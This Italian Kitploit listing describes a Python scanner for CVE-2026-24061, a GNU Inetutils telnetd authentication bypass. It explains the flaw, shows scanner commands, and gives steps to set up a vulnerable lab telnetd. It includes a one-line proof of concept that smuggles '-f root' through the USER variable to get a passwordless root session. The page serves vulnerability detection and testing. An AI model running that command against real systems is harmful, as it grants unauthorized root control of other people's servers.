Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/monstertsl/cve-2026-24061
Scanner di VulnerabilitàExploitPenetration TestingAutenticazioneStrumento di Accesso Remoto
GitHubmonstertsl/cve-2026-24061

CVE-2026-24061

Scanner basato su Python che rileva CVE-2026-24061 in GNU Inetutils telnetd, consentendo test batch di più target per la vulnerabilità di bypass dell'autenticazione.

Vedi Repository
17 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Strumento di rilevamento batch per la vulnerabilità CVE-2026-24061

⚠️ Nota: CVE-2026-24061 GNU Inetutils è una suite di strumenti di rete classici fornita dal progetto GNU, che include il servizio telnetd, ovvero il demone del server Telnet. Nelle versioni da 1.9.3 a 2.7, il servizio telnetd presenta un difetto fatale nel processo di autenticazione utente. Quando il servizio chiama il programma di login di sistema /usr/bin/login, non riesce a filtrare e validare efficacemente la variabile d'ambiente USER fornita dal client. Un attaccante può impostare un valore specifico per la variabile USER, iniettando direttamente il parametro -f nel comando login. Il parametro -f del programma viene utilizzato per "saltare la seconda autenticazione", consentendo all'attaccante di bypassare completamente tutti i controlli di verifica della password e stabilire direttamente una sessione remota come utente , ottenendo così il massimo controllo sul server. Questa vulnerabilità è estremamente pericolosa, equivalente a una backdoor root remota pubblica che non richiede alcuna credenziale.

login
root

POC per il rilevamento della vulnerabilità

root@kitploit:~
USER='-f root' telnet -a <target_ip>

Script di rilevamento

demo.png

Rilevamento singolo

root@kitploit:~
python3 cve-2026-24061.py -i 10.10.168.128

Rilevamento batch

root@kitploit:~
python3 cve-2026-24061.py -f targets.txt

Principio della vulnerabilità

Il comando sopra imposta la variabile d'ambiente USER su -f root. Quando il servizio telnetd vulnerabile riceve la connessione, costruisce ed esegue una chiamata di sistema simile alla seguente:

Passaggi per la riproduzione

1. Installare i programmi necessari

root@kitploit:~
sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y

2. Rimuovere il commento dalla riga telnet (assicurarsi che il formato sia corretto)

root@kitploit:~
sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf

3. Riavviare il servizio

root@kitploit:~
sudo systemctl restart openbsd-inetd

4. Controllare la porta

root@kitploit:~
sudo ss -tuln | grep ':23'

5. Test locale

root@kitploit:~
telnet localhost 23
Scarica lo strumento